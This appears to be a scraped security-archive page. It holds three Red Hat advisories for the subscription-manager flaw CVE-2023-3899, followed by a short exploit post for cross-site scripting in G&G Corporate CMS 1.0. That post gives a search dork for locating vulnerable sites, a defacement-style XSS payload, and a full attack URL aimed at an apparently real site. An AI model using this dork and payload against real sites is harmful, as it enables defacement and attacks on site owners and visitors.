These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-3899  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk5RhiAAoJENzjgjWX9erE1EIQAI61ApYyI+tZSxe2YuT+uEpV  
k3/7OcXjqLBeK9KMyEg4yceoVtrvjxSk2k5q1iDSMOUgFanqxzOJWjUMkkI1TfBh  
OfGSzjpOdE59Y4HXCiNyZA3dQd2LsB4WBExN77ddl06J45gU5kJe4p4masf/+P1x  
dJ3lgDDa5+dI9a4Wu1N3ZCeSp/5UoPEIR18cVTlq1BGgkEU9r0VdfE62w1VlDKbZ  
iAGKHuShbTo0lVkpiWoSKzgzRzSynZinU06zgVkLkpNzpPXKhiVZpqwBWf/dvsFr  
51a5wmquR87NBQliYFP6deWcaAIgK3j+/1xD+uJGgdRtJqL2CQVIBUbnMe/EenDd  
VZmpNh7FPahMvX5EvjRGRfWiQjlZQYTuC//p7xMOLX/J2s9Obycx00TuDlGtIVIB  
yq4ELT4qyhu0qNajP8BlZvIhUqmlqAoctYQCCH7bHZtcTdfABDg46vyvToanqKly  
BO4pu/QA8ABaDiseUDZpr6ybqfZVilx0KpMU3NOaTuHpKhm8QuSrusx39JHZSp1y  
dKsch4F+KjqKUtuBLIqCMjw2UPe03zXgX7PAhKim+HcVWLUg64KplHYlljcyQtzb  
pIR/rAUdjrVdyIwhRAmQB2WxPLpq7EVlkmNqqR9ZorTjDvuiSMShKWb0JyzP7UrG  
9V4P6pEnwvnqf7zXZtrt  
=tQZ1  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4703-01

Red Hat Security Advisory 2023-4707-01 - The subscription-manager packages provide programs and libraries to allow users to manage subscriptions and yum repositories from the Red Hat entitlement platform.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: subscription-manager security update  
Advisory ID:       RHSA-2023:4707-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4707  
Issue date:        2023-08-22  
CVE Names:         CVE-2023-3899  
====================================================================  
1. Summary:

An update for subscription-manager is now available for Red Hat Enterprise  
Linux 9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The subscription-manager packages provide programs and libraries to allow  
users to manage subscriptions and yum repositories from the Red Hat  
entitlement platform.

Security Fix(es):

* subscription-manager: inadequate authorization of com.redhat.RHSM1 D-Bus  
interface allows local users to modify configuration (CVE-2023-3899)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2225407 - CVE-2023-3899 subscription-manager: inadequate authorization of com.redhat.RHSM1 D-Bus interface allows local users to modify configuration

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.9.0):

Source:  
subscription-manager-1.29.26.2-2.el9_0.src.rpm

aarch64:  
libdnf-plugin-subscription-manager-1.29.26.2-2.el9_0.aarch64.rpm  
libdnf-plugin-subscription-manager-debuginfo-1.29.26.2-2.el9_0.aarch64.rpm  
python3-cloud-what-1.29.26.2-2.el9_0.aarch64.rpm  
python3-subscription-manager-rhsm-1.29.26.2-2.el9_0.aarch64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.29.26.2-2.el9_0.aarch64.rpm  
subscription-manager-1.29.26.2-2.el9_0.aarch64.rpm  
subscription-manager-debuginfo-1.29.26.2-2.el9_0.aarch64.rpm  
subscription-manager-debugsource-1.29.26.2-2.el9_0.aarch64.rpm  
subscription-manager-plugin-ostree-1.29.26.2-2.el9_0.aarch64.rpm  
subscription-manager-rhsm-certificates-1.29.26.2-2.el9_0.aarch64.rpm

noarch:  
rhsm-icons-1.29.26.2-2.el9_0.noarch.rpm  
subscription-manager-cockpit-1.29.26.2-2.el9_0.noarch.rpm

ppc64le:  
libdnf-plugin-subscription-manager-1.29.26.2-2.el9_0.ppc64le.rpm  
libdnf-plugin-subscription-manager-debuginfo-1.29.26.2-2.el9_0.ppc64le.rpm  
python3-cloud-what-1.29.26.2-2.el9_0.ppc64le.rpm  
python3-subscription-manager-rhsm-1.29.26.2-2.el9_0.ppc64le.rpm  
python3-subscription-manager-rhsm-debuginfo-1.29.26.2-2.el9_0.ppc64le.rpm  
subscription-manager-1.29.26.2-2.el9_0.ppc64le.rpm  
subscription-manager-debuginfo-1.29.26.2-2.el9_0.ppc64le.rpm  
subscription-manager-debugsource-1.29.26.2-2.el9_0.ppc64le.rpm  
subscription-manager-plugin-ostree-1.29.26.2-2.el9_0.ppc64le.rpm  
subscription-manager-rhsm-certificates-1.29.26.2-2.el9_0.ppc64le.rpm

s390x:  
libdnf-plugin-subscription-manager-1.29.26.2-2.el9_0.s390x.rpm  
libdnf-plugin-subscription-manager-debuginfo-1.29.26.2-2.el9_0.s390x.rpm  
python3-cloud-what-1.29.26.2-2.el9_0.s390x.rpm  
python3-subscription-manager-rhsm-1.29.26.2-2.el9_0.s390x.rpm  
python3-subscription-manager-rhsm-debuginfo-1.29.26.2-2.el9_0.s390x.rpm  
subscription-manager-1.29.26.2-2.el9_0.s390x.rpm  
subscription-manager-debuginfo-1.29.26.2-2.el9_0.s390x.rpm  
subscription-manager-debugsource-1.29.26.2-2.el9_0.s390x.rpm  
subscription-manager-plugin-ostree-1.29.26.2-2.el9_0.s390x.rpm  
subscription-manager-rhsm-certificates-1.29.26.2-2.el9_0.s390x.rpm

x86_64:  
libdnf-plugin-subscription-manager-1.29.26.2-2.el9_0.x86_64.rpm  
libdnf-plugin-subscription-manager-debuginfo-1.29.26.2-2.el9_0.x86_64.rpm  
python3-cloud-what-1.29.26.2-2.el9_0.x86_64.rpm  
python3-subscription-manager-rhsm-1.29.26.2-2.el9_0.x86_64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.29.26.2-2.el9_0.x86_64.rpm  
subscription-manager-1.29.26.2-2.el9_0.x86_64.rpm  
subscription-manager-debuginfo-1.29.26.2-2.el9_0.x86_64.rpm  
subscription-manager-debugsource-1.29.26.2-2.el9_0.x86_64.rpm  
subscription-manager-plugin-ostree-1.29.26.2-2.el9_0.x86_64.rpm  
subscription-manager-rhsm-certificates-1.29.26.2-2.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-3899  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk5RhcAAoJENzjgjWX9erEME4P/1rubG43s80BgRQZQ5t1qncL  
ZFQ/9LzXcyJX64JvR14Mhilan2opQj4PojOJV4WtrtnyG1abPW3uJLZP3n0EuLdN  
pfTvKt9oTAo3tlppqeu4T9K/Z7YciinORWKQcUb/hzVAsKEu5vRIetgrDUJKHV5W  
bA4V3XV8FFuQ2erpoKJt2nH4XNROl0b8s/E6MMFocvmg43Nwm+EdV+mrAfa/sXeM  
9HrUP8G+zq2vGCbQ1fG7qB8QACDD8X7sTwCbBVDozHbC/UKnAGdawBHSSk4zN1Qn  
7Wi7cqbnuEqm5E7gW8efjY0DrXs843VmLnURylzfHYicnGz75+AnAJG2MjM5Z61r  
k3qPuFwnqLvdP1qtAVH5hZHfY35WqXULNZmfrYabczgGd6D4hLdpoD2OVM0Z4C4h  
s28nY4NTqzcgY5svpoGMY0aEVD0O4ohfbebKHXh1R9N7Xw1266nRWPYgxkmwHJZq  
uFkb4sPRCvTKAe8lmzutKitOMNh58VTlEbG4L4/tjjts0saPBc/jAtjV9lozQbrv  
Fc9vJaw5BScQH7BLFAkZqYavLeV3OV5/8pAHGBMtq3/alPlwXvd/7EqeGZhK7aAq  
CMhmXJmNM8v/T6k76vUIEsF45U8ZDJiwinhS3CtAiywxBo4F3g+seKdBQ1JLmXCM  
3ZTUkyz1gENZ1G5Gucgo  
=NZgv  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4707-01

Red Hat Security Advisory 2023-4704-01 - The subscription-manager packages provide programs and libraries to allow users to manage subscriptions and yum repositories from the Red Hat entitlement platform.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: subscription-manager security update  
Advisory ID:       RHSA-2023:4704-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4704  
Issue date:        2023-08-22  
CVE Names:         CVE-2023-3899  
====================================================================  
1. Summary:

An update for subscription-manager is now available for Red Hat Enterprise  
Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise  
Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux  
8.4 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v.8.4) - x86_64  
Red Hat Enterprise Linux AppStream E4S (v.8.4) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v.8.4) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS AUS (v.8.4) - noarch, x86_64  
Red Hat Enterprise Linux BaseOS E4S (v.8.4) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS TUS (v.8.4) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The subscription-manager packages provide programs and libraries to allow  
users to manage subscriptions and yum repositories from the Red Hat  
entitlement platform.

Security Fix(es):

* subscription-manager: inadequate authorization of com.redhat.RHSM1 D-Bus  
interface allows local users to modify configuration (CVE-2023-3899)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2225407 - CVE-2023-3899 subscription-manager: inadequate authorization of com.redhat.RHSM1 D-Bus interface allows local users to modify configuration

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v.8.4):

x86_64:  
dnf-plugin-subscription-manager-debuginfo-1.28.13-7.el8_4.x86_64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.13-7.el8_4.x86_64.rpm  
rhsm-gtk-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-debuginfo-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-debugsource-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-initial-setup-addon-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-migration-1.28.13-7.el8_4.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v.8.4):

aarch64:  
dnf-plugin-subscription-manager-debuginfo-1.28.13-7.el8_4.aarch64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.13-7.el8_4.aarch64.rpm  
rhsm-gtk-1.28.13-7.el8_4.aarch64.rpm  
subscription-manager-debuginfo-1.28.13-7.el8_4.aarch64.rpm  
subscription-manager-debugsource-1.28.13-7.el8_4.aarch64.rpm  
subscription-manager-initial-setup-addon-1.28.13-7.el8_4.aarch64.rpm  
subscription-manager-migration-1.28.13-7.el8_4.aarch64.rpm

ppc64le:  
dnf-plugin-subscription-manager-debuginfo-1.28.13-7.el8_4.ppc64le.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.13-7.el8_4.ppc64le.rpm  
rhsm-gtk-1.28.13-7.el8_4.ppc64le.rpm  
subscription-manager-debuginfo-1.28.13-7.el8_4.ppc64le.rpm  
subscription-manager-debugsource-1.28.13-7.el8_4.ppc64le.rpm  
subscription-manager-initial-setup-addon-1.28.13-7.el8_4.ppc64le.rpm  
subscription-manager-migration-1.28.13-7.el8_4.ppc64le.rpm

s390x:  
dnf-plugin-subscription-manager-debuginfo-1.28.13-7.el8_4.s390x.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.13-7.el8_4.s390x.rpm  
rhsm-gtk-1.28.13-7.el8_4.s390x.rpm  
subscription-manager-debuginfo-1.28.13-7.el8_4.s390x.rpm  
subscription-manager-debugsource-1.28.13-7.el8_4.s390x.rpm  
subscription-manager-initial-setup-addon-1.28.13-7.el8_4.s390x.rpm  
subscription-manager-migration-1.28.13-7.el8_4.s390x.rpm

x86_64:  
dnf-plugin-subscription-manager-debuginfo-1.28.13-7.el8_4.x86_64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.13-7.el8_4.x86_64.rpm  
rhsm-gtk-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-debuginfo-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-debugsource-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-initial-setup-addon-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-migration-1.28.13-7.el8_4.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v.8.4):

aarch64:  
dnf-plugin-subscription-manager-debuginfo-1.28.13-7.el8_4.aarch64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.13-7.el8_4.aarch64.rpm  
rhsm-gtk-1.28.13-7.el8_4.aarch64.rpm  
subscription-manager-debuginfo-1.28.13-7.el8_4.aarch64.rpm  
subscription-manager-debugsource-1.28.13-7.el8_4.aarch64.rpm  
subscription-manager-initial-setup-addon-1.28.13-7.el8_4.aarch64.rpm  
subscription-manager-migration-1.28.13-7.el8_4.aarch64.rpm

ppc64le:  
dnf-plugin-subscription-manager-debuginfo-1.28.13-7.el8_4.ppc64le.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.13-7.el8_4.ppc64le.rpm  
rhsm-gtk-1.28.13-7.el8_4.ppc64le.rpm  
subscription-manager-debuginfo-1.28.13-7.el8_4.ppc64le.rpm  
subscription-manager-debugsource-1.28.13-7.el8_4.ppc64le.rpm  
subscription-manager-initial-setup-addon-1.28.13-7.el8_4.ppc64le.rpm  
subscription-manager-migration-1.28.13-7.el8_4.ppc64le.rpm

s390x:  
dnf-plugin-subscription-manager-debuginfo-1.28.13-7.el8_4.s390x.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.13-7.el8_4.s390x.rpm  
rhsm-gtk-1.28.13-7.el8_4.s390x.rpm  
subscription-manager-debuginfo-1.28.13-7.el8_4.s390x.rpm  
subscription-manager-debugsource-1.28.13-7.el8_4.s390x.rpm  
subscription-manager-initial-setup-addon-1.28.13-7.el8_4.s390x.rpm  
subscription-manager-migration-1.28.13-7.el8_4.s390x.rpm

x86_64:  
dnf-plugin-subscription-manager-debuginfo-1.28.13-7.el8_4.x86_64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.13-7.el8_4.x86_64.rpm  
rhsm-gtk-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-debuginfo-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-debugsource-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-initial-setup-addon-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-migration-1.28.13-7.el8_4.x86_64.rpm

Red Hat Enterprise Linux BaseOS AUS (v.8.4):

Source:  
subscription-manager-1.28.13-7.el8_4.src.rpm

noarch:  
rhsm-icons-1.28.13-7.el8_4.noarch.rpm  
subscription-manager-cockpit-1.28.13-7.el8_4.noarch.rpm

x86_64:  
dnf-plugin-subscription-manager-1.28.13-7.el8_4.x86_64.rpm  
dnf-plugin-subscription-manager-debuginfo-1.28.13-7.el8_4.x86_64.rpm  
python3-subscription-manager-rhsm-1.28.13-7.el8_4.x86_64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.13-7.el8_4.x86_64.rpm  
python3-syspurpose-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-debuginfo-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-debugsource-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-plugin-ostree-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-rhsm-certificates-1.28.13-7.el8_4.x86_64.rpm

Red Hat Enterprise Linux BaseOS E4S (v.8.4):

Source:  
subscription-manager-1.28.13-7.el8_4.src.rpm

aarch64:  
dnf-plugin-subscription-manager-1.28.13-7.el8_4.aarch64.rpm  
dnf-plugin-subscription-manager-debuginfo-1.28.13-7.el8_4.aarch64.rpm  
python3-subscription-manager-rhsm-1.28.13-7.el8_4.aarch64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.13-7.el8_4.aarch64.rpm  
python3-syspurpose-1.28.13-7.el8_4.aarch64.rpm  
subscription-manager-1.28.13-7.el8_4.aarch64.rpm  
subscription-manager-debuginfo-1.28.13-7.el8_4.aarch64.rpm  
subscription-manager-debugsource-1.28.13-7.el8_4.aarch64.rpm  
subscription-manager-plugin-ostree-1.28.13-7.el8_4.aarch64.rpm  
subscription-manager-rhsm-certificates-1.28.13-7.el8_4.aarch64.rpm

noarch:  
rhsm-icons-1.28.13-7.el8_4.noarch.rpm  
subscription-manager-cockpit-1.28.13-7.el8_4.noarch.rpm

ppc64le:  
dnf-plugin-subscription-manager-1.28.13-7.el8_4.ppc64le.rpm  
dnf-plugin-subscription-manager-debuginfo-1.28.13-7.el8_4.ppc64le.rpm  
python3-subscription-manager-rhsm-1.28.13-7.el8_4.ppc64le.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.13-7.el8_4.ppc64le.rpm  
python3-syspurpose-1.28.13-7.el8_4.ppc64le.rpm  
subscription-manager-1.28.13-7.el8_4.ppc64le.rpm  
subscription-manager-debuginfo-1.28.13-7.el8_4.ppc64le.rpm  
subscription-manager-debugsource-1.28.13-7.el8_4.ppc64le.rpm  
subscription-manager-plugin-ostree-1.28.13-7.el8_4.ppc64le.rpm  
subscription-manager-rhsm-certificates-1.28.13-7.el8_4.ppc64le.rpm

s390x:  
dnf-plugin-subscription-manager-1.28.13-7.el8_4.s390x.rpm  
dnf-plugin-subscription-manager-debuginfo-1.28.13-7.el8_4.s390x.rpm  
python3-subscription-manager-rhsm-1.28.13-7.el8_4.s390x.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.13-7.el8_4.s390x.rpm  
python3-syspurpose-1.28.13-7.el8_4.s390x.rpm  
subscription-manager-1.28.13-7.el8_4.s390x.rpm  
subscription-manager-debuginfo-1.28.13-7.el8_4.s390x.rpm  
subscription-manager-debugsource-1.28.13-7.el8_4.s390x.rpm  
subscription-manager-plugin-ostree-1.28.13-7.el8_4.s390x.rpm  
subscription-manager-rhsm-certificates-1.28.13-7.el8_4.s390x.rpm

x86_64:  
dnf-plugin-subscription-manager-1.28.13-7.el8_4.x86_64.rpm  
dnf-plugin-subscription-manager-debuginfo-1.28.13-7.el8_4.x86_64.rpm  
python3-subscription-manager-rhsm-1.28.13-7.el8_4.x86_64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.13-7.el8_4.x86_64.rpm  
python3-syspurpose-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-debuginfo-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-debugsource-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-plugin-ostree-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-rhsm-certificates-1.28.13-7.el8_4.x86_64.rpm

Red Hat Enterprise Linux BaseOS TUS (v.8.4):

Source:  
subscription-manager-1.28.13-7.el8_4.src.rpm

aarch64:  
dnf-plugin-subscription-manager-1.28.13-7.el8_4.aarch64.rpm  
dnf-plugin-subscription-manager-debuginfo-1.28.13-7.el8_4.aarch64.rpm  
python3-subscription-manager-rhsm-1.28.13-7.el8_4.aarch64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.13-7.el8_4.aarch64.rpm  
python3-syspurpose-1.28.13-7.el8_4.aarch64.rpm  
subscription-manager-1.28.13-7.el8_4.aarch64.rpm  
subscription-manager-debuginfo-1.28.13-7.el8_4.aarch64.rpm  
subscription-manager-debugsource-1.28.13-7.el8_4.aarch64.rpm  
subscription-manager-plugin-ostree-1.28.13-7.el8_4.aarch64.rpm  
subscription-manager-rhsm-certificates-1.28.13-7.el8_4.aarch64.rpm

noarch:  
rhsm-icons-1.28.13-7.el8_4.noarch.rpm  
subscription-manager-cockpit-1.28.13-7.el8_4.noarch.rpm

ppc64le:  
dnf-plugin-subscription-manager-1.28.13-7.el8_4.ppc64le.rpm  
dnf-plugin-subscription-manager-debuginfo-1.28.13-7.el8_4.ppc64le.rpm  
python3-subscription-manager-rhsm-1.28.13-7.el8_4.ppc64le.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.13-7.el8_4.ppc64le.rpm  
python3-syspurpose-1.28.13-7.el8_4.ppc64le.rpm  
subscription-manager-1.28.13-7.el8_4.ppc64le.rpm  
subscription-manager-debuginfo-1.28.13-7.el8_4.ppc64le.rpm  
subscription-manager-debugsource-1.28.13-7.el8_4.ppc64le.rpm  
subscription-manager-plugin-ostree-1.28.13-7.el8_4.ppc64le.rpm  
subscription-manager-rhsm-certificates-1.28.13-7.el8_4.ppc64le.rpm

s390x:  
dnf-plugin-subscription-manager-1.28.13-7.el8_4.s390x.rpm  
dnf-plugin-subscription-manager-debuginfo-1.28.13-7.el8_4.s390x.rpm  
python3-subscription-manager-rhsm-1.28.13-7.el8_4.s390x.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.13-7.el8_4.s390x.rpm  
python3-syspurpose-1.28.13-7.el8_4.s390x.rpm  
subscription-manager-1.28.13-7.el8_4.s390x.rpm  
subscription-manager-debuginfo-1.28.13-7.el8_4.s390x.rpm  
subscription-manager-debugsource-1.28.13-7.el8_4.s390x.rpm  
subscription-manager-plugin-ostree-1.28.13-7.el8_4.s390x.rpm  
subscription-manager-rhsm-certificates-1.28.13-7.el8_4.s390x.rpm

x86_64:  
dnf-plugin-subscription-manager-1.28.13-7.el8_4.x86_64.rpm  
dnf-plugin-subscription-manager-debuginfo-1.28.13-7.el8_4.x86_64.rpm  
python3-subscription-manager-rhsm-1.28.13-7.el8_4.x86_64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.13-7.el8_4.x86_64.rpm  
python3-syspurpose-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-debuginfo-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-debugsource-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-plugin-ostree-1.28.13-7.el8_4.x86_64.rpm  
subscription-manager-rhsm-certificates-1.28.13-7.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-3899  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk5RhRAAoJENzjgjWX9erEkFcQAJXsfy9Mcja8GUJAasrRvvWI  
8WX0dfXyFduP4MvuyEUJnciNQgegAtvFODdxLQN6d9NJckyhFhsLyQ5wAZHvzLcJ  
udLORc9cn42P4t2XuoWsXApeBTUYyxRW1fmJJzMyeTmGTtDEf4F/TTQEa/j/gjvI  
CJ1f58PdspccDQLhppj02bFdwDHM+W6uLaKookyn2DuZ5hlmoRMbWNV4N0mde+4i  
GI66+u22FjWjr3EzbwcOiScsuFUSYVELnul7lyaJ0oSdVvAbnHSoxJpUojmUJU0t  
7jZHGOuiXuae+4SA75cwDTm4ZYvyrreEYQnqVHsXkSa+6LBFYfO3m+cqF3rgJxzI  
/MD2VPq12iIreGP0iXQZRfpU29SL8A95G/D5X6N1Ch+g48SbxMlIUX2WzRC5HxyU  
32vpTNVNiJmTh+11Adc++Tj+qZAO1PEMsnc3jG+AiXEcGwgtmHVI8ZVT+hWZLdQt  
JYKA1Ow6ilWC0wNktl/REvSe3LSb1CLRMU1lyPeZ85fAg/Thlox7bpPz5ndCM35E  
MGchKCjYyEz16puV3fMFJbM5YKsVLPELed6Y52q8cA0pM7AZ8lpMOkWjcrHJFKMS  
nNE01Upgef/JdfIlDjXqIXUIzI1Fq9zVrz7zMM3QHa7K5jhnyg4weSVCV18fkw83  
KJ5IItPF26Ky/o5clbmc  
=xl+P  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4704-01

G and G Corporate CMS version 1.0 suffers from a cross site scripting vulnerability.

**G And G Corporate CMS 1.0 Cross Site Scripting**

Posted Aug 23, 2023

Authored by indoushka

G and G Corporate CMS version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | ec7e6459653c2e6f1683c120c47e58e61d870a911a466497ef2ef99455a30669

Download | Favorite | View

**G And G Corporate CMS 1.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : G&G Corporate CMS v1.0  XSS Vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://gegweb.it                                                                                                   |  | # Dork      : intext:Powered by Studio G&G Corporate Communication site:it                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /prodotti.php?LANG=2&id=prodotti&CAT=1'<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://priolinoxit/prodotti.php?LANG=2&id=prodotti&CAT=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,006)
*   Arbitrary (16,212)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,347)
*   DoS (23,453)
*   Encryption (2,370)
*   Exploit (51,952)
*   File Inclusion (4,222)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,785)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,147)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,799)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,888)
*   Shell (3,186)
*   Shellcode (1,215)
*   Sniffer (894)
*   Spoof (2,207)
*   SQL Injection (16,383)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,953)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,819)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,504)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,750)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,835)
*   UNIX (9,291)
*   UnixWare (186)
*   Windows (6,574)
*   Other

Tag

#linux